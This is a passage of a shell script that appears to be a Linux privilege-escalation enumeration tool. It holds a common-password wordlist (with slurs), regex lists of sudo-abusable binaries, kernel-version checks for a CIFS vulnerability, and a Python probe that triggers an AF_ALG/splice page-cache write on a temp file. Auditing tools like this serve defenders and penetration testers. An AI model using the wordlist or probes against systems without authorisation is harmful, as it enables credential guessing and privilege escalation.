rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston \ 1838 snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar \ 1839 stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade \ 1840 redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland \ 1841 nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer \ 1842 katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar \ 1843 charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \ 1844 andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \ 1845 plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude" 1846 1847 if [ "$(ps auxwww 2>/dev/null | wc -l 2>/dev/null)" -lt 8 ]; then 1848 NOUSEPS="1" 1849 fi 1850 1851 TIMEOUT="$(command -v timeout 2>/dev/null || echo -n '')" 1852 1853 sudoVB1=" \*|env_keep\W*\+=.*LD_PRELOAD|env_keep\W*\+=.*LD_LIBRARY_PATH|env_keep\W*\+=.*BASH_ENV|env_keep\W*\+=.* ENV|env_keep\W*\+=.*PATH|!env_reset|!requiretty|[^a-zA-Z0-9]7z$|[^a-zA-Z0-9]R$|aa-exec$|[^a-zA-Z0-9]ab$|[^a-zA-Z0-9]acr$|alpine$|ansible-playbook$|ansible-test$|aoss$|apache2$|apache2ctl$|apt-get$|aptitude$|[^a-zA-Z0-9]ar$|arch-nspawn$|aria2c$|[^a-zA-Z0-9]arj$|[^a-zA-Z0-9]arp$|[^a-zA-Z0-9]as$|ascii-xfr$|ascii85$|[^a-zA-Z0-9]ash$|aspell$|asterisk$|[^a-zA-Z0-9]at$|atobm$|autoconf$|autoheader$|autoreconf$|[^a-zA-Z0-9]aws$|base32$|base58$|base64$|basenc$|basez$|bash$|bashbug$|batcat$|bbot$|[^a-zA-Z0-9]bc$|bconsole$|[^a-zA-Z0-9]bee$|borg$|bpftrace$|bridge$|bundle$|busctl$|busybox$|byebug$|bzip2$|cabal$|cancel$|capsh$|cargo$|[^a-zA-Z0-9]cat$|cdist$|certbot$|chattr$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|choom$|chown$|chroot$|chrt$|clamscan$|clisp$|cmake$|[^a-zA-Z0-9]cmp$|cobc$|code$|codex$|column$|comm$|composer$|cowsay$|cowthink$|[^a-zA-Z0-9]cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|[^a-zA-Z0-9]csh$|csplit$|csvtool$|[^a-zA-Z0-9]ctr$|cupsfilter$|curl$|[^a-zA-Z0-9]cut$|dash$|date$|[^a-zA-Z0-9]dc$|[^a-zA-Z0-9]dd$|debugfs$|dhclient$|dialog$|diff$|[^a-zA-Z0-9]dig$|distcc$|dmesg$|dmsetup$|[^a-zA-Z0-9]dnf$|dnsmasq$|doas$|docker$|dos2unix$|dosbox$|dotnet$|dpkg$|dstat$|dvips$|easy_install$|easyrsa$|[^a-zA-Z0-9]eb$|[^a-zA-Z0-9]ed$|efax$|egrep$|elvish$|emacs$|enscript$|[^a-zA-Z0-9]env$|[^a-zA-Z0-9]eqn$|espeak$|[^a-zA-Z0-9]ex$|exiftool$|expand$|expect$|facter$|fail2ban-client$|fastfetch$|ffmpeg$|fgrep$|file$|find$|finger$|firejail$|fish$|flock$|[^a-zA-Z0-9]fmt$|fold$|forge$|fping$|[^a-zA-Z0-9]ftp$|[^a-zA-Z0-9]fzf$|gawk$|[^a-zA-Z0-9]gcc$|gcloud$|gcore$|[^a-zA-Z0-9]gdb$|[^a-zA-Z0-9]gem$|genie$|genisoimage$|getent$|[^a-zA-Z0-9]ghc$|ghci$|gimp$|ginsh$|[^a-zA-Z0-9]git$|gnuplot$|[^a-zA-Z0-9]go$|[^a-zA-Z0-9]grc$|grep$|gtester$|guile$|gzip$|hashcat$|head$|hexdump$|[^a-zA-Z0-9]hg$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|[^a-zA-Z0-9]ip$|iptables-save$|[^a-zA-Z0-9]irb$|ispell$|java$|[^a-zA-Z0-9]jjs$|[^a-zA-Z0-9]joe$|join$|journalctl$|[^a-zA-Z0-9]jq$|jrunscript$|jshell$|jtag$|julia$|knife$|ksshell$|[^a-zA-Z0-9]ksu$|kubectl$|last$|latex$|latexmk$|ld.so$|ldconfig$|less$|lftp$|links$|[^a-zA-Z0-9]ln$|loginctl$|logrotate$|logsave$|look$|[^a-zA-Z0-9]lp$|ltrace$|[^a-zA-Z0-9]lua$|lualatex$|luatex$|lwp-download$|lwp-request$|[^a-zA-Z0-9]lxd$|[^a-zA-Z0-9]m4$|mail$|make$|[^a-zA-Z0-9]man$|mawk$|minicom$|more$" 1854 sudoVB2="mosh-server$|mosquitto$|mount$|msfconsole$|msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|[^a-zA-Z0-9]mtr$|multitime$|mutt$|[^a-zA-Z0-9]mv$|mypy$|mysql$|nano$|nasm$|[^a-zA-Z0-9]nc$|ncdu$|ncftp$|needrestart$|neofetch$|[^a-zA-Z0-9]nft$|nginx$|nice$|[^a-zA-Z0-9]nl$|[^a-zA-Z0-9]nm$|nmap$|node$|nohup$|[^a-zA-Z0-9]npm$|nroff$|nsenter$|ntpdate$|octave$|[^a-zA-Z0-9]od$|opencode$|openssl$|openvpn$|openvt$|opkg$|pandoc$|passwd$|paste$|[^a-zA-Z0-9]pax$|[^a-zA-Z0-9]pdb$|pdflatex$|pdftex$|perf$|perl$|perlbug$|pexec$|[^a-zA-Z0-9]pg$|[^a-zA-Z0-9]php$|[^a-zA-Z0-9]pic$|pidstat$|[^a-zA-Z0-9]pip$|pipx$|pkexec$|[^a-zA-Z0-9]pkg$|plymouth$|podman$|poetry$|posh$|[^a-zA-Z0-9]pr$|procmail$|[^a-zA-Z0-9]pry$|psftp$|psql$|[^a-zA-Z0-9]ptx$|puppet$|pwsh$|pygmentize$|pyright$|python$|qpdf$|rake$|ranger$|[^a-zA-Z0-9]rc$|readelf$|redcarpet$|redis$|restic$|[^a-zA-Z0-9]rev$|rlogin$|rlwrap$|[^a-zA-Z0-9]rpm$|rpmdb$|rpmquery$|rpmverify$|rsync$|rsyslogd$|rtorrent$|ruby$|run-mailcap$|run-parts$|runscript$|rustc$|rustdoc$|rustfmt$|rustup$|sash$|scanmem$|[^a-zA-Z0-9]scp$|screen$|script$|scrot$|[^a-zA-Z0-9]sed$|service$|setarch$|setcap$|setfacl$|setlock$|sftp$|[^a-zA-Z0-9]sg$|shred$|shuf$|slsh$|smbclient$|snap$|socat$|socket$|soelim$|softlimit$|sort$|split$|sqlite3$|sqlmap$|[^a-zA-Z0-9]ss$|[^a-zA-Z0-9]ssh$|ssh-agent$|ssh-copy-id$|ssh-keygen$|ssh-keyscan$|sshfs$|sshpass$|sshuttle$|start-stop-daemon$|stdbuf$|strace$|strings$|[^a-zA-Z0-9]su$|sudo$|sysctl$|systemctl$|systemd-resolve$|systemd-run$|[^a-zA-Z0-9]tac$|tail$|tailscale$|[^a-zA-Z0-9]tar$|task$|taskset$|tasksh$|[^a-zA-Z0-9]tbl$|tclsh$|tcpdump$|tcsh$|tdbtool$|[^a-zA-Z0-9]tee$|telnet$|terraform$|[^a-zA-Z0-9]tex$|tftp$|[^a-zA-Z0-9]tic$|time$|timedatectl$|timeout$|tmate$|tmux$|[^a-zA-Z0-9]top$|torify$|torsocks$|troff$|[^a-zA-Z0-9]tsc$|tshark$|[^a-zA-Z0-9]ul$|unexpand$|uniq$|unshare$|unsquashfs$|unzip$|update-alternatives$|urlget$|uuencode$|[^a-zA-Z0-9]uv$|vagrant$|valgrind$|varnishncsa$|[^a-zA-Z0-9]vi$|vigr$|[^a-zA-Z0-9]vim$|vipw$|virsh$|volatility$|[^a-zA-Z0-9]w3m$|wall$|watch$|[^a-zA-Z0-9]wc$|wg-quick$|wget$|whiptail$|whois$|wireshark$|wish$|xargs$|xdg-user-dir$|xdotool$|xmodmap$|xmore$|xpad$|[^a-zA-Z0-9]xxd$|[^a-zA-Z0-9]xz$|yarn$|yash$|yelp$|yt-dlp$|[^a-zA-Z0-9]yum$|zathura$|zcat$|zgrep$|[^a-zA-Z0-9]zic$|[^a-zA-Z0-9]zip$|zless$|[^a-zA-Z0-9]zsh$|zsoelim$|zypper$" 1855 1856 1857 1858 1859 # Functions 1860 1861 print_info(){ 1862 printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC 1863 } 1864 1865 cs46243_kernel_is_fixed() { 1866 cs46243_kernel="${1%%-*}" 1867 cs46243_major="$(printf '%s' "$cs46243_kernel" | cut -d. -f1)" 1868 cs46243_minor="$(printf '%s' "$cs46243_kernel" | cut -d. -f2)" 1869 cs46243_patch="$(printf '%s' "$cs46243_kernel" | cut -d. -f3)" 1870 case "$cs46243_major:$cs46243_minor:$cs46243_patch" in 1871 *[!0-9:]*|::*|*:|:*) return 1 ;; 1872 esac 1873 [ "$cs46243_major" -gt 7 ] && return 0 1874 if [ "$cs46243_major" -eq 7 ]; then 1875 [ "$cs46243_minor" -ge 1 ] && return 0 1876 [ "$cs46243_minor" -eq 0 ] && [ "$cs46243_patch" -ge 11 ] && return 0 1877 return 1 1878 fi 1879 [ "$cs46243_major" -lt 2 ] && return 0 1880 if [ "$cs46243_major" -eq 2 ]; then 1881 [ "$cs46243_minor" -lt 6 ] && return 0 1882 [ "$cs46243_minor" -eq 6 ] && [ "$cs46243_patch" -lt 24 ] && return 0 1883 return 1 1884 fi 1885 case "$cs46243_major.$cs46243_minor" in 1886 5.10) [ "$cs46243_patch" -ge 258 ] ;; 1887 5.15) [ "$cs46243_patch" -ge 209 ] ;; 1888 6.1) [ "$cs46243_patch" -ge 175 ] ;; 1889 6.6) [ "$cs46243_patch" -ge 142 ] ;; 1890 6.12) [ "$cs46243_patch" -ge 92 ] ;; 1891 6.18) [ "$cs46243_patch" -ge 34 ] ;; 1892 *) return 1 ;; 1893 esac 1894 } 1895 checkCIFSwitchCVE202646243() { 1896 [ "$(uname -s 2>/dev/null)" = "Linux" ] || return 0 1897 cs46243_root="${ROOT_FOLDER:-/}" 1898 case "$cs46243_root" in 1899 */) ;; 1900 *) cs46243_root="${cs46243_root}/" ;; 1901 esac 1902 cs46243_modules="${cs46243_root}proc/modules" 1903 if ! [ -d "${cs46243_root}sys/module/cifs" ]; then 1904 [ -r "$cs46243_modules" ] && grep -q '^cifs[[:space:]]' "$cs46243_modules" 2>/dev/null || return 0 1905 fi 1906 cs46243_config="" 1907 cs46243_helper="" 1908 # request-key reads the drop-in directory before the main file. 1909 for cs46243_config in "${cs46243_root}"etc/request-key.d/*.conf "${cs46243_root}etc/request-key.conf"; do 1910 [ -r "$cs46243_config" ] || continue 1911 cs46243_helper="$(awk '$1 == "create" && $2 == "cifs.spnego" && $5 ~ /(^|\/)cifs\.upcall$/ { print $5; exit }' "$cs46243_config" 2>/dev/null)" 1912 [ "$cs46243_helper" ] && break 1913 done 1914 [ "$cs46243_helper" ] || return 0 1915 case "$cs46243_helper" in 1916 /*) cs46243_helper_host="${cs46243_root}${cs46243_helper#/}" ;; 1917 *) cs46243_helper_host="$cs46243_helper" ;; 1918 esac 1919 [ -x "$cs46243_helper_host" ] || return 0 1920 cs46243_request_key="${cs46243_root}sbin/request-key" 1921 [ -x "$cs46243_request_key" ] || return 0 1922 cs46243_kallsyms="${cs46243_root}proc/kallsyms" 1923 if [ -r "$cs46243_kallsyms" ] && grep -q '[[:space:]]cifs_spnego_key_vet_description' "$cs46243_kallsyms" 2>/dev/null; then 1924 return 1925 fi 1926 cs46243_kernel="$(cat "${cs46243_root}proc/sys/kernel/osrelease" 2>/dev/null)" 1927 [ "$cs46243_kernel" ] || cs46243_kernel="$(uname -r 2>/dev/null)" 1928 cs46243_kernel_is_fixed "$cs46243_kernel" && return 1929 print_3title "CIFSwitch attack chain (CVE-2026-46243)" "T1068" 1930 print_info "https://access.redhat.com/security/vulnerabilities/RHSB-2026-005" 1931 echo "Loaded CIFS module + active cifs.spnego rule + executable request-key/cifs.upcall helpers" | sed -${E} "s,.*,${SED_RED_YELLOW}," 1932 echo "Kernel $cs46243_kernel does not expose the upstream cifs.spnego validation marker; vendor backports should be verified" | sed -${E} "s,.*,${SED_LIGHT_CYAN}," 1933 echo "Rule: $cs46243_config -> $cs46243_helper" 1934 } 1935 1936 print_list(){ 1937 printf ${BLUE}"═╣ $GREEN$1"$NC #There is 1 "═" 1938 } 1939 1940 cf31_num() { 1941 printf '%s\n' "$1" | sed 's/[^0-9].*$//; s/^0*//; s/^$/0/' 1942 } 1943 cf31_is_fixed_upstream_release() { 1944 if [ "$CF31_MAJ" -ge 7 ]; then 1945 return 0 1946 fi 1947 if [ "$CF31_MAJ" -eq 6 ]; then 1948 case "$CF31_MIN" in 1949 19) [ "$CF31_PAT" -ge 12 ] && return 0 ;; 1950 18) [ "$CF31_PAT" -ge 22 ] && return 0 ;; 1951 12) [ "$CF31_PAT" -ge 85 ] && return 0 ;; 1952 6) [ "$CF31_PAT" -ge 137 ] && return 0 ;; 1953 1) [ "$CF31_PAT" -ge 170 ] && return 0 ;; 1954 esac 1955 elif [ "$CF31_MAJ" -eq 5 ]; then 1956 case "$CF31_MIN" in 1957 15) [ "$CF31_PAT" -ge 204 ] && return 0 ;; 1958 10) [ "$CF31_PAT" -ge 254 ] && return 0 ;; 1959 esac 1960 fi 1961 return 1 1962 } 1963 cf31_py_can_run_probe() { 1964 CF31_PY="$1" 1965 if command -v timeout >/dev/null 2>&1; then 1966 timeout "$CF31_PY_TIMEOUT" "$CF31_PY" -c 'import ctypes, os, sys 1967 try: 1968 if hasattr(os, "splice"): 1969 sys.exit(0) 1970 libc = ctypes.CDLL(None, use_errno=True) 1971 sys.exit(0 if hasattr(libc, "splice") else 1) 1972 except Exception: 1973 sys.exit(1) 1974 ' >/dev/null 2>&1 1975 else 1976 "$CF31_PY" -c 'import ctypes, os, sys 1977 try: 1978 if hasattr(os, "splice"): 1979 sys.exit(0) 1980 libc = ctypes.CDLL(None, use_errno=True) 1981 sys.exit(0 if hasattr(libc, "splice") else 1) 1982 except Exception: 1983 sys.exit(1) 1984 ' >/dev/null 2>&1 1985 fi 1986 } 1987 cf31_run_python_probe() { 1988 CF31_PY="$1" 1989 CF31_TMP_PY=/tmp/cf31-probe-$$.py 1990 trap 'rm -f "$CF31_TMP_PY"' EXIT HUP INT TERM 1991 cat > "$CF31_TMP_PY" <<'PY' 1992 import errno, os, signal, socket, struct, sys, tempfile, shutil 1993 try: 1994 signal.signal(signal.SIGALRM, lambda *_: (_ for _ in ()).throw(TimeoutError("probe timeout"))) 1995 signal.alarm(10) 1996 except Exception: 1997 pass 1998 AF_ALG=38 1999 SOCK_SEQPACKET=5 2000 SOL_ALG=279 2001 ALG_SET_KEY=1 2002 ALG_SET_IV=2 2003 ALG_SET_OP=3 2004 ALG_SET_AEAD_ASSOCLEN=4 2005 ALG_SET_AEAD_AUTHSIZE=5 2006 ALG_OP_DECRYPT=0 2007 ALG="authencesn(hmac(sha256),cbc(aes))" 2008 PAGE=4096 2009 TARGET_OFF=16 2010 MARK=b"CF31" 2011 def out(msg, code): 2012 print(msg, flush=True) 2013 raise SystemExit(code) 2014 def build_splice(): 2015 if hasattr(os, "splice"): 2016 def _splice(fd_in, fd_out, length, offset_src=None, offset_dst=None): 2017 return os.splice(fd_in, fd_out, length, offset_src=offset_src, offset_dst=offset_dst) 2018 return _splice 2019 try: 2020 import ctypes 2021 libc=ctypes.CDLL(None, use_errno=True) 2022 splice_fn=libc.splice 2023 off_t=ctypes.c_longlong 2024 splice_fn.argtypes=[ctypes.c_int, ctypes.POINTER(off_t), ctypes.c_int, ctypes.POINTER(off_t), ctypes.c_size_t, ctypes.c_uint] 2025 splice_fn.restype=ctypes.c_ssize_t 2026 except Exception as e: 2027 out("PYTHON_UNUSABLE: splice helper is not available (%s)" % e, 1) 2028 def _splice(fd_in, fd_out, length, offset_src=None, offset_dst=None): 2029 in_off=off_t(offset_src) if offset_src is not None else None 2030 out_off=off_t(offset_dst) if offset_dst is not None else None 2031 n=splice_fn( 2032 fd_in, 2033 ctypes.byref(in_off) if in_off is not None else None, 2034 fd_out, 2035 ctypes.byref(out_off) if out_off is not None else None, 2036 length, 2037 0, 2038 ) 2039 if n < 0: 2040 err=ctypes.get_errno() 2041 raise OSError(err, os.strerror(err)) 2042 return n 2043 return _splice 2044 SPLICE=build_splice() 2045 fd=rfd=wfd=None 2046 op=master=None 2047 td=None 2048 try: 2049 try: 2050 master=socket.socket(AF_ALG, SOCK_SEQPACKET, 0) 2051 master.bind(("aead", ALG)) 2052 except OSError as e: 2053 out("NOT VULNERABLE: AF_ALG/authencesn is not reachable from this context (%s)" % (e.strerror or e), 0) 2054 master.setsockopt(SOL_ALG, ALG_SET_KEY, bytes.fromhex("0800010000000010" + "00"*32)) 2055 master.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4) 2056 op,_=master.accept() 2057 try: 2058 op.settimeout(3.0) 2059 except Exception: 2060 pass 2061 td=tempfile.mkdtemp(prefix="cf31-check-") 2062 path=os.path.join(td, "sentinel") 2063 baseline=b"A"*PAGE 2064 with open(path, "wb") as f: 2065 f.write(baseline) 2066 fd=os.open(path, os.O_RDONLY) 2067 os.read(fd, PAGE) 2068 os.lseek(fd, 0, 0) 2069 cmsgs=[ 2070 (SOL_ALG, ALG_SET_OP, struct.pack("I", ALG_OP_DECRYPT)), 2071 (SOL_ALG, ALG_SET_IV, struct.pack("I",16)+b"\x00"*16), 2072 (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I",8)), 2073 ] 2074 op.sendmsg([b"AAAA"+MARK], cmsgs, socket.MSG_MORE) 2075 rfd,wfd=os.pipe() 2076 splice_len=TARGET_OFF+len(MARK) 2077 n=SPLICE(fd, wfd, splice_len, offset_src=0) 2078 if n != splice_len: 2079 out("UNKNOWN: short splice file->pipe (%d/%d)" % (n, splice_len), 1) 2080 n2=SPLICE(rfd, op.fileno(), splice_len) 2081 if n2 != splice_len: 2082 out("UNKNOWN: short splice pipe->AF_ALG (%d/%d)" % (n2, splice_len), 1) 2083 try: 2084 op.recv(64) 2085 except OSError as e: 2086 if e.errno not in (errno.EBADMSG, errno.EINVAL): 2087 raise 2088 except TimeoutError: 2089 out("PYTHON_PROBE_UNKNOWN: recv timed out", 1) 2090 os.lseek(fd, 0, 0) 2091 after=os.read(fd, PAGE) 2092 if after[TARGET_OFF:TARGET_OFF+len(MARK)] == MARK: 2093 out("VULNERABLE: non-destructive AF_ALG/splice page-cache write triggered", 2) 2094 if after != baseline: 2095 out("VULNERABLE: temp-file page cache changed unexpectedly", 2) 2096 out("NOT VULNERABLE: Python runtime probe left temp-file page cache intact", 0) 2097 except SystemExit: 2098 raise 2099 except Exception as e: 2100 